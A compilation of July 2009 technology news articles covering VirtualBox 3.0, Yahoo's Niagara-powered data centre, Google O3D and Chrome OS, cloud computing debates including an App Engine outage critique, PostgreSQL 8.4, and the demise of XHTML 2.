News from July, 2009

by Timothy Prickett Morgan

Update: This story originally said that Sun had not open-sourced VirtualBox. Sun does offer an open source version

Only two weeks ago, Sun Microsystems quietly kicked out two quick betas of its VirtualBox 3.0 desktop and sometimes server-virtualization hypervisor, and today, the product is ready for prime time.
Click here to find out more!

That was a short beta program, wasn't it?

VirtualBox will go down in its history as one of the most popular programs distributed by Sun Microsystems just ahead of its $5.6bn takeover by software giant and hardware wan(not)abe Oracle a few weeks from now.

According to Andy Hall, the senior product manager at Sun who speaks for VirtualBox, Sun was trying to be low-key about the VirtualBox 3.0 beta, but thanks in part to El Reg and a few other trade rags that caught the beta slipping out, Sun got over 25,000 people to download the code in the past two weeks and give it a whirl.

All told, Sun saw over 1 million downloads in both April and May of this year, hitting 14.5 million downloads in total since VirtualBox was launched in October 2007 by German software company Innotek (acquired by Sun in February 2008). Product registrations have crested above 4 million. "The rate of downloads is actually accelerating, and so is the rate of registrations," says Hall, adding that the conversion rate is quite high. "We're really pleased by the snowballing effect."

Sun has not talked about the conversion that perhaps matters most: how many people have opted to pay the piddling $30 per year that Sun charges for tech support on VirtualBox.

As El Reg reported two weeks ago, VirtualBox 3.0 is a major upgrade of the product.

The most important new feature is virtual SMP support that now allows a single VirtualBox guest operating system to span as many as 32 virtual processors on x64 machines. A virtual processor in VirtualBox lingo, I've been told, is one core no matter how many threads it has supporting simultaneous multithreading.

This expanded virtual SMP support for VirtualBox partitions requires VT-x features on Intel's Core and Xeon processors and AMD-V features on Advanced Micro Devices' Athlon and Opteron processors - and with this expansion, VirtualBox will be able to easily create a single partition on the biggest four-socket x64 iron on the market.

Not that this is practical or desirable considering that a guest partition can only support 16 GB of main memory - 512 MB per core is not a balanced configuration on a 32-core server.

So it's reasonable to assume that one of the next feature Sun (or Oracle) will put into the next VirtualBox release is support for a lot more main memory per guest - at least 64GB and maybe as high as 256GB. Hall was mum on the subject.

VirtualBox 3.0 also has Direct3D 8 and 9 graphics support for applications, which allows design programs, modeling applications, and games to run in guests and make use of these graphics functions from inside guest operating systems. The software also includes support for OpenGL 2.0 graphics, which are supported in Linux, Windows, and Solaris.

VirtualBox is a type 2 hypervisor, rather than a type 1 (bare metal) hypervisor, which means it runs atop Windows, Linux, Mac OS, or Solaris (the host environment) and then slices up the CPU, memory, and I/O capacity of the machine to support multiple guest operating systems. (There are lots of different guests, but Mac OS is not one of them because Apple has rules about virtualizing its OS). Hall says that Sun has no plans to create a bare-metal version of VirtualBox, a project that its rival on desktops, Parallels, is taking on, and Citrix is working with Intel to create as well for desktops.

If Sun were not in the process of being subsumed into Oracle, which itself is picking over the carcass of Virtual Iron to make a beefed up version of the Xen hypervisor, Sun might have come to the realization that turning VirtualBox into a type 1 hypervisor is a better idea than trying to cook up another variant of Xen using OpenSolaris as the wrapper for the hypervisor. This is what Sun's xVM Server hypervisor was supposed to be, but now, it is something like nine months late to market and very likely never to see the light of day because if Oracle doesn't need one thing, it is three different Xen hypervisor stacks. The kindest thing to do might be to sell off VirtualBox and let it live by itself. Maybe Oracle will be kind and do that. (OK, you don't have to laugh that hard....)

Hall says that Sun doesn't track how customers are deploying VirtualBox but that anecdotal evidence suggests that it is seeing more and more action on servers. At the recent JavaOne trade show in San Francisco, Sun plunked down a bunch of racks of x64 servers running Solaris 10 and put VirtualBox atop of that Unix to allow it to drive virtualized Windows 7, Ubuntu, or Solaris images from Sun Ray thin clients. Anyone attending JavaOne got a smart card that let them log into the virtual desktop system, and they could pick whatever platform they wanted. Hall says Sun set up the infrastructure so it could generate and manage as many as 21,000 unique desktops over the course of the event, and some 16,000 desktops were created by attendees.

Even with the Oracle acquisition looming, Hall says the Virtual Box team is keeping focused and is getting set to kick off a community-driven Web console project for managing multiple guests across the network. Sun could have - and maybe should have - opted to use xVM OpsCenter, the management tool that was supposed to span all of Sun's different server and desktop virtualization products (dynamic domains, Solaris containers, and logical domains on Sparc boxes and Xen partitions, Solaris containers, and VirtualBox slices on x64 iron).

But with Oracle probably converging around a Xen stack once the Sun deal is done, it is probably time for VirtualBox to get its own management tools. Hall says that VirtualBox 3.0 already has some APIs that have been changed to expose management features and that it will be working with a number of independent projects that have already been started out there on the Web to create a single console written in Python. This project is expected to launch "in a few months," according to Hall.

Provided Oracle doesn't step on it, of course. With VirtualBox being open source, what Oracle does or doesn't do doesn't matter a damned bit. VirtualBox can live on. ®

by Tom Krazit

Yahoo thinks its plan for a new data center could eventually help the company achieve carbon-neutral status without having to resort to the purchase of carbon offsets.

Yahoo designed its forthcoming data center to let outside air cool the servers at all times, borrowing the idea from the design of a chicken coop, according to Yahoo co-founder David Filo. The company joined New York officials such as Governor David Patterson and Senator Charles Schumer Tuesday to unveil plans for the data center, the design of which Yahoo is attempting to patent.

Data centers are vital to huge Internet businesses such as Yahoo, and companies throughout this industry have started paying more and more attention to the amount of energy consumed by facilities that can have thousands of servers running all day, every day. Google has talked up its own push for greater efficiency in its data centers, and Microsoft just announced plans for two new data centers geared around energy efficiency.

As part of the announcement of the new data center in Lockport, N.Y., just outside of Buffalo, Yahoo also revealed that it will no longer purchase carbon offsets as part of its energy strategy. Carbon offsets have been controversial in some quarters, but they allow companies to claim they are "carbon neutral," in that purchasing offsets diverts money to green projects.

Yahoo plans to focus its green strategy on projects such as the Buffalo data center rather than the purchase of offsets, which means it will take them some time to return to the carbon-neutral goal set in 2007. "We believe creating highly-efficient data centers will have a greater long-term, direct impact on the environment and gives us the best opportunity to play a leadership role in addressing climate change," Filo wrote.

Corrected at 3:05 p.m.: Yahoo clarified the new data center will be in Lockport, N.Y., just outside of Buffalo.

by Paul Krill

Google this week began offering a "substantial" update to its O3D API for building rich, interactive 3-D applications in a browser, tuning it for different types of hardware.

Highlighted at the Google I/O conference in May and shown running in a Google Chrome browser at that time, O3D enables 3-D graphics and features a JavaScript API. IT began as an effort to establish an open Web standard for 3-D graphics. An update was released Monday.

"With today's release, we focused on addressing a theme we heard in the requests and feedback from the community: That O3D should run as well as possible on many different types of hardware," said Google product manager Henry Bridge in a blog post. "Toward that end, we're releasing two new additions: Software rendering and feature requirements. If you've already installed the O3D plugin, you should receive these additions automatically."

Software rendering lets O3D use the main processor to render 3-D images if the machine running the application does not have supported graphics hardware. The concept of feature requirements, meanwhile, will help minimize how often O3D has to fall back to software rendering.

"Feature requirements allow developers to state upfront that their app will require certain hardware capabilities to render properly. If the machine running the app supports those features, O3D will run it fully hardware accelerated; if however, it is lacking any of the required capabilities, O3D will drop into a software rendered mode," Bridge said.

Other features include a full-screen mode to make O3D applications more absorbing and a community gallery featuring demonstrations that use O3D. Developers can submit applications for inclusion in the gallery.

O3D is intended to use hardware acceleration on a variety of GPU chip sets to provide high-end real-time 3-D graphics on most systems.

by Timothy Prickett Morgan

In one of the brighter moments of New York governor David Patterson's unanticipated and beleaguered administration, Yahoo! has announced that it will plunk down its next data centre just east of Buffalo, New York, so it can tap the carbon-free hydroelectric power generated by Niagara Falls.

When - not if - New York City has a blackout, as it gets very hot in the summer and there are not enough megawatts to go around, we'll all know who to blame. It will be the exclamation point that broke the generator's back.

Governor Patterson - who has his hands tied by a deadlocked state senate that has been refusing to do its job because it cannot decide which party is in charge - and (federal) Senator Chuck Schumer of New York have been pushing to win the $150m Yahoo! data centre deal for Buffalo. They got some credit from David Dibble, Yahoo!'s executive vice president of service engineering and operations, who announced the winning bid.

But the real reason why this deal went down in New York - and not in Ohio, Pennsylvania, Illinois or Virginia, as was reported in the Albany Business Review - is the New York Power Authority. It runs the hydropower in western New York, which has Niagara Falls as its main generating facility. NYPA has guaranteed a total of 15 megawatts of hydropower that the Business Review says will save Yahoo! around $100m over a 15-year period.

The statement put out by Patterson's office concerning the Yahoo! data centres says it will be located in the town of Lockport, east of Buffalo in Niagara County. Yahoo! plans to invest "tens of millions of dollars" to put its East Coast regional data centre, weighing in at 190,000 square feet, on a 30-acre plot in an industrial park. Not counting construction work, the data centre is expected to create 125 jobs.

The Lockport data centre has been allocated 10 megawatts of power during the initial construction phase and data centre buildup. Construction is expected to start in August, with the first phase of the facility being operational in January 2011. In a second phase that starts in the spring of 2012, Yahoo! will build out the Lockport data centre, spending an additional "tens of millions of dollars," and would get an extra allotment of 5 megawatts of guaranteed power from NYPA.

Based on that power consumption, you would assume that another 95,000 square feet of data centre space will be built in the second phase of the project. It is not clear how many servers Yahoo! will put into the data centre, but using modern half-width two-socket "Nehalem EP" servers, you could put about 167,000 server nodes in that 190,000 square feet of space. The second phase of the Lockport data centre would push it up to around 250,000 server nodes.

Western New York has been courting big data centres thanks to the relatively cheap electricity it can generate from Niagara Falls, and was disappointed last year when HSBC pulled the plug on a $139m, 275,000 square foot data centre that was to open in nearby Cambria, New York. The subprime mortgage mess killed that deal, and HSBC decided to load up its data centres in Chicago rather than pour new concrete in Cambria. It is also planning to shut down facilities in Buffalo and the suburb city of Amherst.

Bringing in Yahoo! to replace the lost HSBC centres was something all politicians were clearly interested in doing. This is why so many of them lined up in Patterson's statement. Still, we're talking about 125 jobs and maybe an aggregate payroll for them of $8m to $9m. The incentives that New York state and the regional governments gave were not divulged, but those jobs are only worth about $125m to $130m over a 15-year term. Hopefully the economics works out in the long run.

According to a report at CNET, Yahoo! co-founder David Filo said the Lockport data centre will use outside air for cooling, something you can do for many months of the year in the chilly Buffalo region. Filo also said that Yahoo! would stop buying carbon offsets in an effort to make itself carbon neutral, and would instead focus on getting its data centres to be as efficient as possible. ®

by Sumner Lemon

Cloud-based services are being rolled out without enough attention being paid to securing these services and the information they handle. That was the finding of a recent study commissioned by RSA Security.

While the report's findings are alarming, there is still time for providers of these services to address the problem, said Art Coviello, executive vice president at EMC and president of RSA Security. The key is to look at security as an integral part of the service and not as an add-on feature, he said.

Coviello recently sat down with IDG News Service to discuss the security of cloud-based services. What follows is an edited transcript of that conversation:

Art Coviello: It was startling to me that a lot of this cloud computing was being done with security left behind, because I viewed cloud computing as an opportunity to really change the way people approached security. In essence, you're rebuilding the information infrastructure from the ground up. It'll be years before all these legacy systems get moved over, either to internal, private clouds or external clouds, or some combination thereof. Ultimately, that's where it's headed and because of that, because we have knowledge and forethought of all the issues we've had in security over the last decade and a half.

One would think that we've learned our lesson about building security in. Having said that, it's still very early days. Although I find the research alarming, I don't necessarily find it conclusive that this is the way it will turn out.

IDGNS: Is part of the problem that vendors aren't necessarily liable for all of the risk associated with offering these services? Would the services be more secure if they had to fully assume all of that risk?

Coviello: It could be if the person that purchases these services are not careful. But it's hard to imagine that any responsible provider of these services would deliberately make their offering insecure. Woe unto them, they'll be out of business pretty quick. The one thing you can rest assured of is if there's any security breach in one of these services, someone is just going to take their infrastructure and go elsewhere. It's a lot easier to do that in a cloud environment than it might be if you've outsourced your infrastructure.

IDGNS: How does a company know that a cloud-computing provider offers a secure service?

Coviello: Enterprises have the wherewithal and the skill to evaluate the cloud provider's capability and their capability in security, and they would be stupid not to do a thorough investigation because they're outsourcing everything.

IDGNS: What do you think is the greatest security weakness for cloud-computing services?

Coviello: It's almost too early to tell. How many instances do you see of cloud computing out there? I can give you a number of places where there could be insecurities. What people tend to worry about is the co-mingling of information, and that's probably the least of anybody's worries because it's very easy to partition data. What they ought to be more worried about is what are the access controls, what the authentication mechanisms are, how you ensure information doesn't somehow leak out to somebody outside.

I'd worry about those things, but these are things that are going to have to be investigated and developed as people start to get a feeling for what cloud computing is all about.

by Matt Asay

Redmonk analyst Stephen O'Grady writes a bleak, but likely accurate, eulogy for open source's relevance to cloud computing. In a world where horsepower matters more than the software feeding those "horses," in terms of the entry cost to compete, and where big vendors like Amazon and Google are already divvying up the market, the odds of a small-fry, open-source start-up challenging "Goliath" are slim.

It's not a new argument: Nick Carr has been suggesting for some time that only a few, big companies can afford relevance in this hardware-intensive business.

Given this fact, O'Grady thinks the best we can hope for (and he thinks it's pretty important) is "a loose coalition or confederation of [open-source] projects and vendors that will together comprise an increasingly viable top to bottom alternative to some of the cloud providers today." He includes projects like Puppet (Reductive Labs) and Hadoop in this mix, but is careful to point out that he doesn't see a full-fledged, open-source alternative seriously challenging the closed platforms of Google, Amazon, Salesforce, and the other mega-clouds.

This 'David' alternative to the 'Goliath' big vendors doesn't beat them, but instead helps to keep Goliath honest. Really, when you think about it for more than a few seconds, that's what open source has done for traditional computing, too.

Look around. The big vendors controlling IT and the Web are...the same vendors that controlled it yesterday, and are likely the same vendors that will control it 10 years from now. Sure, they'll swap places for a few years, but does anyone really believe that IBM and Microsoft won't still be cat-fighting a decade from now?

But now consider what open source has been doing, mostly behind the scenes. Open source is changing the way these big vendors operate, because it's altering customer expectations.

Open source has permeated Microsoft to the point that it is now considering throwing its weight behind the Spring Framework and other open-source projects.

Google, for its part, went from a happy consumer of open source to an active contributor to open source on a very big scale. Not because Google is "not evil," but because it realizes that open source can give it a competitive advantage in the market.

We'll see more of this as open source challenges otherwise proprietary vendors to compete through openness. We're already seeing some of this as vendors like Red Hat seek to claim parts of the cloud for open source.

In so doing, open source will continue to challenge and change the buying conversation, resetting expectations to transparency, something we desperately need: if the allegation that the Bill and Melinda Gates Foundation is pressuring governments to buy Microsoft technologies is even remotely true, the best antidote may be open-source procurement policies.

In sum, don't expect open source to "win" in the cloud; at least, not in the form of an open-source vendor doing the winning. Rather, look to open source to influence, to shape the cloud.

Just like it has to traditional, proprietary software.

by Tom Jowitt

Sun has upgraded one of its most popular freeware products after releasing a major new version of its open-source virtualization tool xVM VirtualBox, which includes the ability to cope with demanding server workloads.

VirtualBox proved popular when it first appeared back in 2007 from Stuttgart, Germany-based Innotek. Sun later acquired Innotek in February 2008. At the time, Sun revealed that the product had been downloaded over 4 million times, but Sun now says it has surpassed 14.5 million downloads and 4 million registrations worldwide, as well as more than 25,000 downloads a day.

So what is VirtualBox? Well, it is a x86 virtualization product designed for both enterprise and home use. Essentially it is both a desktop and server-virtualization hypervisor, and is freely available as open source software under the terms of the GNU General Public License (GPL).

It runs on Windows, Linux, Macintosh, and OpenSolaris hosts, and supports a large number of guest operating systems including Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, and OpenBSD.

Put simply, if a user downloaded and installed VirtualBox onto their laptop, they could then run most any other popular operating system on the same machine besides its native OS. Or they could run several operating systems at the same time, depending on what hardware resources are available.

This makes it an incredibly useful tool for software developers who want to target multiple operating systems in order to maximize their audience and return on investment (ROI). VirtualBox gives them the opportunity to run things such test environments etc, on a single laptop for example.

Back in September last year, Sun said it had improved VirtualBox's performance and platform support when it released VirtualBox 2.0. But now the company has released a major upgrade, version 3.0, which it says offers improved desktop and server virtualization features.

On the desktop side, it can now run Microsoft Direct3D support for Windows guests, which allows for graphically intensive Windows applications, such computer modelling, 3D design and games software, to run in a virtual environment. Support for version 2.0 of the Open Graphics Library (OpenGL) standard has also been added, which allows for high performance graphical applications that typically use graphical hardware acceleration. Finally, support for a wider range of USB devices, such as iPods, mobile phones and storage devices has also been added.

But it is on the server side, which has seen the most significant updates. With more and more multi-threaded database and Web applications making use of multiple CPUs, VirtualBox 3.0 can now support virtual SMP systems with up to 32 virtual CPUs (vCPUs) in a single virtual machine. This now gives VirtualBox the ability to run 'heavyweight data-processing workloads.'

by Ted Dziuba

Fail and You. Last week, users of Google App Engine - Google's application hosting platform - discovered a new feature in the product: downtime (http://www.theregister.co.uk/2009/07/02/google_app_engine_fail/). App Engine was offline for roughly six hours, and for much of that time, even the status page which tells users about downtime was unavailable. Now that's a strong way to send a message.

As a reminder: Google App Engine is Google's response to Amazon Web Services. Amazon has set up a scheme where customers can have full access to virtual computers and can also pay for scalability-included services like S3 for storage and a messaging system. It's a fair balance between automatic scaling and control. Google, on the other hand, offers developers a Python and Java API to its database back-end and absolutely zero control over the machines on which your application is running.

App Engine developers must go through the effort to contort their program to Google's data storage mechanism, which in some cases can be a far cry from SQL. The benefit to this is that you don't have to worry about scalability, ever. Allegedly. It's sort of like how a heroin addiction means that you don't have to worry about reality, ever.

As with anything that flies through a cloud, Google App Engine can suffer a double flame-out and crash to the ground, killing hundreds and swearing a large subset of the population off of air travel for quite some time. Google has paying customers for App Engine, and maybe Wonka doesn't quite understand this, but when people pay you for a service, they expect a certain amount of transparency and honesty.

Watching Google's response to the App Engine downtime reminded me of the cruel 2008 US Vice Presidential debates, where everyone watching just wanted to pull Sarah Palin aside and say "Sweetie, this is a grown-up event. You need to use your big-girl words now." Google's explanation for six hours of downtime was basically, "Shit got ill."

The meat of Google's postmortem on the failure was this, a message posted to the App Engine e-mail group: "There was a serious issue in one of App Engine's datacenters with GFS, Google's low level storage system. GFS underlies Bigtable, which in turn underlies App Engine's Datastore. GFS also provides storage for our application serving infrastructure, so GFS unavailability caused problems for Datastore reads and writes, as well as application serving."

Let's say that you were tasked with maintaining the computing platform for your company's web services. After six hours of service outage, your supervisor asked you for an explanation of what happened, and you follow Google's lead. You say, "There was a serious issue with one or more of our computers." Ass, meet curb.

Almost a year ago, Amazon's S3 storage service suffered roughly eight hours of downtime. Amazon's postmortem on the failure included details about specific bugs in their message passing system, and how their wonderfully scalable system could also scale errors quite wonderfully. Amazon identified an oversight in their own code with respect to error checking, so as a customer, you could be sure that somebody is on that shit.

Google, on the other hand, doesn't feel like telling anyone exactly why GFS failed. Was it a bug in the code? Was it a traffic issue? Did Augustus Gloop fall into the chocolate river?

As far as preventing future such failures, Google is equally as tight-lipped. Their postmortem only says this: "The team has been actively working on a solution in the medium-term that would allow us to switchover data centers immediately without consistency problems."

Um, fantastic. When will that be deployed? Why specifically could you not fail over in this case? Do you realize that you're being paid for this? By comparison, Amazon outlined four changes they made to their system, in both code and monitoring, to prevent that type of failure from happening again.

One could argue over the necessity of up-time for the types of apps that appear on App Engine. After all, the world only needs so many RSS readers and Twitter clones. But this highlights the greater risk of hosting your applications in the - and oh it pains me to say this, but for the sake of brevity - cloud. Every time there is downtime like this, be it Google App Engine or Amazon Web Services or Microsoft Azure, tech pundits all tell us that it's not ready for prime time. What the fuck does that even mean? My guess: "My editor wanted me to cover this story and I lack the originality to make any meaningful contribution."

I'll go out on a limb here. Hosting production services on platforms like App Engine is never a good idea. It may be fine for some toy application or a web service that you never plan to make any money from, but when your livelihood depends on it, will you really trust the business to a company whose failure response is the technical version of "whoooa, sorry bro, my bad?" Clearly, you can draw a line when it comes to outsourcing. But for serious business, if you can't put your hands on the metal - or order someone else to put their hands on the metal - then you're due for an embarrassment. And it's nobody's fault but your own.

Google's sell really appeals to the engineers, but I hope that the decision makers can see through the bullshit. Automatic scalability? Really? Or did you guys drop too much capital expenditure on machines and have to come up with a way to make a return on that investment? Maybe it's less of a tell than I think it is, but the App Engine main product page has a prominent link to the terms of service at the top, and no link or contact information for support. Google's introverted population certainly knows that it's easier and cheaper to legalese your way out of a customer's problem than it is to hire a person to pick up the phone.

Man, supporting real people is way harder than selling ads. ®

by James Urquhart

Cloud computing is one of those operations models that has already started to disrupt the way in which everyone consumes software.

It is also starting to have an effect (albeit tiny right now) on the way in which people and organizations consume (or don't consume) hardware. Cloud computing has become a part of the core information technology "fabric" of many.

Cloud computing does, however, generate more than its fair share of disagreement and debate. Vendors, customers, bloggers, twitterers, and even consumers have spend many thousands of hours, hundreds of thousands of words, and millions of dollars trying to convince the world that their view of cloud computing is "the one." Meanwhile, thousands of other very smart people are questioning the core assumptions on which cloud computing's value proposition rests.

You would think this dissent would be detrimental to the adoption and growth of cloud computing, but it's not. Partially that's for the relatively lame reason that every new definition and every new "must-have" feature expand the possibility of what cloud computing is...thereby growing the term "cloud computing" through a sort of linguistic acquisition strategy.

However, it is also in part due to the fact that these debates are spurring a huge amount of brain power to focus on some really difficult-to-solve cloud-related problems. The tension created by disagreement and debate in the cloud computing marketplace is spurring entrepreneurs, vendors, and even individuals to achieve their independent visions of what could be. Tension drives innovation, in this case.

Let me give you three examples of what I am talking about. These are probably the three most important examples of how disagreement is driving technology road maps industrywide. Some of these disagreements are clearly self-serving--established systems vendors protecting their markets while enthusiastic entrepreneurs attempt to redefine the markets outright. Some are just different ways of seeing the same subject, but with profound effects on the choices made by vendors and individuals on each side of the debate.
Consumer and small/midsize business versus enterprise

One of the biggest sources of tension among those that debate cloud computing definitions is the difference between the needs of individuals and small/medium businesses (SMB) versus those of their larger enterprise counterparts.

The former is looking to minimize cost and complexity as much as possible by eliminating the need to own things. Consumer/SMB is a market in which providing service through standardized devices reigns supreme, and the requirement to own anything other than basic access devices-laptops, Netbooks, smartphones, and the like-is detrimental. This marketplace sees the issue as outsourcing as much information technology as possible and is willing to place a high level of trust in providers to achieve that.

Enterprises, however, tend to be much more concerned maintaining their existing investments in IT while gaining a return on investment for new spending on new technologies or processes. A tremendous amount has been spent on making IT a trusted resource (though clearly with mixed results). Enterprises won't move forward on cloud unless they can maintain that level of trustworthiness without excessive expenditure.

So the consumer/SMB market is trying to drive the enterprise towards pure IT as a service, and the enterprise is trying to get cloud providers to up their game in security, control, service levels, and compliance. All are very good for cloud customers as a whole.
Public cloud versus private cloud

Closely related to the problem of how to run IT is where to run it. And by running it, I don't necessarily where the hardware is running, but where controls that define "the cloud" are maintained. Who owns the systems that manage the cloud and that define things like access rights, available software images, and network service configurations?

This is essentially the heart of the debate about how much service is provided by IT--how much cloud must be on the Internet for it to be cloud. Those who believe "private clouds" are unnecessary generally believe that you can get everything you need from your public cloud provider. Take Amazon Web Services, for instance. Using its console, its messaging infrastructure, its data stores, and so on, many developers are arguing that there is little reason to build and operate new applications anywhere else.

The argument for private clouds, however, is generally based on the risks inherent in external public clouds-things like lock-in, data ownership, regulatory concerns, security, etc.-as well as the alleged ability of private clouds to provide a smoother migration path to external clouds than going straight to public clouds today.

So, the public cloud crowd is pushing internal IT and individuals toward using third-party services to replace capital intensive IT, while the private cloud crowd is pushing cloud service providers to see interacting with existing IT infrastructure as an enabler for cloud adoption. Again, both are good for cloud customers.
Open source versus proprietary

While the previous two arguments have been about how and where to operate IT, this debate is a little different. It is about software technology, and it is actually about much more than cloud computing. On the surface, it's the same old "free versus commercial" debate. But when you dig down from a cloud perspective, you find nuances that will be critical to the future form of the cloud.

You've probably read about the debate regarding whether cloud computing is the logical conclusion of open source. Many open source companies note that in order to profit from open source, they must be exceptional service businesses. As cloud computing is all about service delivery, it is a natural model in which to sell open source services.

That argument, while critical, isn't the whole story, however. The other side of the coin is the debate about whether one can build competitive cloud services using anything other than open source. Most of the leading clouds available today are heavy users of open-source software, and many of the most compelling server images in Amazon's image library are based on open source.

Folks like Microsoft and VMWare, however, would beg to differ and are working furiously to prove to the market that their value add is worth the cost of their software. The argument is that these companies can pay for innovation and for a partner ecosystem that drives new business and have the customer relationships to work through long-term cloud deployment issues.

Here, the open-source community is playing a critical role in driving a new business model for software delivery (free software, for-fee service), while the so-called "proprietary" platforms are building ecosystems that push open source to continually reinforce its value to developers.

In the end, while I have preferences in each of these debates, it is impossible to declare any winners at this point. And that is good, as our constant testing of each others' principles will lead to an ever-increasing richness in cloud computing offerings for years to come.

by Timothy Prickett Morgan

The open source project behind the PostgreSQL relational database is blowing its nose trumpeting the availability of PostgresSQL 8.4, a rev that includes 293 new or improved features that make the database easier to administer and more useful to programmers and end users.

The new code, which is available for download here, was set to launch on June 29, but had a show-stopper bug that needed to be fixed at the last minute, according to Josh Berkus, a member of the PostgreSQL core development team. The bug related to the standby database failover feature of PostgreSQL that could have potentially caused some data loss for certain setups, so Berkus held up the release for two days to test a bug fix. (The bug fix worked, and if it didn't, then PostgreSQL 8.4 would still not be available).

While there are a plethora of features that database administrators and programmers are going to eat up, the big enhancements in PostgreSQL 8.4 include the ability to do a parallel database restore (which can speed up database recovery time by a factor of two to eight, depending on the underlying iron and how you set it up) and the ability to do "in-place" upgrades from PostgreSQL 8.3 to 8.4 "without extensive downtime." (It would be best, of course, to have no downtime. That's why companies that can't take downtime have high availability clustering of their database servers). This pg_Migrator tool is still in beta, by the way.

PostgreSQL also includes a new set of query monitoring tools, to allow administrators to monitor end users and see what queries they are launching at the database. (Some users, particularly in marketing, are fond of launching complex queries during peak transaction loads and inadvertently cripple system throughput with their crafty questions).

The updated database also includes ANSI SQL2003 features such as recursive joins, windowing functions, and common table expressions, features which allow end users to pose different kinds of questions of their databases that was possible with PostgreSQL 8.3 and earlier releases. There are enhancements to stored procedures, such as default parameters and variadic parameters, that the project says makes database programming more simple and compact as well.

The blow-by-blow feature list for PostgreSQL 8.4 is in the release notes, and the project has put together a feature matrix so you can see the evolution of PostgreSQL from the 7.4 though 8.4 releases. PostgreSQL 8.4 comes in pre-compiled binaries for FreeBSD, Linux, Mac OS X, Solaris (the x64 version of Solaris 10 only), and Windows operating systems. If you are a real do-it-yourselfer, it is possible to compile PostgreSQL source code to run on AIX, HP-UX, SCO UnixWare and OpenServer, and Irix Unixes, and it can run on just about any chip architecture you can name, as the release notes show. ®

by Martyn Williams

Google is developing an open-source operating system targeted at Internet-centric computers such as netbooks and will release it later this year, the company said Wednesday.

The OS, which will carry the same "Chrome" name as the company's browser, is expected to begin appearing on netbook computers in the second half of 2010, Google said in a blog post.

It is already talking to "multiple" companies about the project, it added.

The Chrome OS will be available for computers based on the x86 architecture, which is used by Intel and Advanced Micro Devices (AMD), and the Arm architecture.

Prototypes of Arm-based netbooks began appearing last month at the Computex show in Taiwan and Google's support for the architecture could give it a significant boost. Microsoft's mainstream Windows operating system doesn't run on Arm chips so many manufacturers were talking about using Linux or a version of Google's Android operating system. It's not immediately clear how much the two operating systems share in common code but Google said they are aimed at very different devices.

"Google Chrome OS is a new project, separate from Android," it said. "Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the Web."

While Google is initially looking at the netbook segment of the market it might compete with Microsoft and Apple on larger, Internet-centric machines.

Chrome OS is "being designed to power computers ranging from small netbooks to full-size desktop systems," said Google.

The heart of Chrome OS is the Linux kernel. Applications, which can be written in standard Web programming languages, will run inside Google Chrome in a new windowing system. They will additionally run inside the Chrome browser on Windows, Mac or Linux machines, meaning that a single application could run on almost any computer.

Wide support for the platform will be key to getting developers involved and so an important factor in its degree of success.

"We have a lot of work to do, and we're definitely going to need a lot of help from the open source community to accomplish this vision," Google said in its blog post.

For end users Google promised a better computing experience on machines with faster access to e-mail, fast boot-up times, access to data from anywhere and the end of problematic hardware configuration, software updates and security issues.

"We are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work," Google said.

by Stephen Shankland

XHTML 2, we hardly knew you.

XHTML 2, a technology intended to build a more powerful Web from the ground up, met a quiet end last week, spotlighting the difficulties of standardization in a fast-moving Internet. Introduced in 2002, XHTML 2 was a centerpiece of standards work at the World Wide Web Consortium (W3C).

But incompatibility with the existing Web and a direction at odds with Web developers' desires doomed it to a slow demise. On Thursday, after a long reconciliation with browser makers who'd struck off in a different direction, the W3C announced that it will wind down development of XHTML 2 this year.

Instead, the group will channel those resources into standardizing what the browser makers have been toiling on all these years: HTML 5, a sprawling collection of new features to improve the present Hypertext Markup Language. Although elements of XHTML 2 will live on in HTML 5, overall, the browser makers prevailed.

"XHTML 2 was a beautiful specification of philosophical purity that had absolutely no resemblance to the real world," said Bruce Lawson, HTML 5 evangelist for browser maker Opera.

So what went wrong? In short, the Web has many masters, but the ones with final say over its nature are those who build it page by page, not the standards group trying to create a new foundation.

XHTML 2 was designed to reform the Web as a medium for publishing documents, but the developers-and the browser makers who listened closely to those developers-instead wanted a platform for interactive applications. And while that direction prevailed, its incarnation in HTML 5 faces its own set of challenges now.

The consensus for HTML 5 support has been building for years, and the W3C already had been increasing its involvement in its standardization well before it decided to put an end to much of the competing XHTML 2 standard. Although the HTML-XHTML split has been fractious at times, there's inescapable tension between standards groups trying to chart the future and vendors whose products relate to those standards.

"I will not say it's been the smoothest way of doing things, but it's not an unnatural way for things to proceed," said Mike Smith, leader of HTML work at W3C, speaking of the reconciliation process that rejuvenated the W3C's HTML work. "Vendors are the ones who drive innovation on the Web for the most part."

Why XHTML?
So if it's so clear today that HTML 5 is the way to go, why was so much energy, time, and research invested in XHTML 2? It was an attempt start afresh without HTML's shortcomings.

The X in XHTML stands for XML, which in turn stands for Extensible Markup Language. XML is a broad technology that uses a strict set of tags to label different types of content in a document, and XHTML was engineered specifically for the Web. XHTML brought rigor to the loosey-goosey and slap-dash world of HTML, and it would have permitted developers to employ a broader range of computing engines called parsers to digest and process the XML, Smith said.

XHTML "was a cleaner and better-architected version of HTML," Smith said. And in its earlier years, it had support. "At the time when XHTML 2 was first conceived and specified in the early drafts, most everybody thought it was a good idea. A lot of people in hindsight want to look back at it now and make the claim that they knew it wasn't going to have success," Smith said.
XHTML 2.0 made it to working draft stage, but only parts of the specification will live on in HTML 5.

XHTML 2.0 made it to working draft stage, but only parts of the specification will live on in HTML 5.

One example of its utility is the tight coupling of textual information with a graphs encoded with the SVG, or Scalable Vector Graphics format, Smith said. Another advantage was better browsing with the limited abilities of mobile phones.

One of the big problems with XHTML 2 was that it wasn't backwards compatible, though. Not only could it not be used to display existing Web pages, but Web browsers had to be expanded with an entirely new engine for handling the XML. Notably, Microsoft's Internet Explorer, the dominant browser by far, couldn't handle XHTML on its own.

Another problem was that there was plenty of demand for improvements to HTML, which W3C had declared finished with version 4.01 in 1999.

"People were so focused on XHTML 2 that they were substantially less interested in modifying the application model and introducing new features to HTML that developers were clamoring for," said Arun Ranganathan, standards evangelist for Mozilla, the organization behind the Firefox browser. "We felt the standards going on at the time...were disconnected from a large majority of developers.

Microsoft agrees with its browser rival.

"We've never heard a strong request from our developer audience and customers for XHTML 2," said Amy Barzdukas, general manager for IE.

Enter WHATWG
One crucial moment came five years ago when Opera and Mozilla representatives showed the W3C an idea called WebForms for improving HTML. "We jointly presented this paper to W3C, who rejected it," Lawson said.

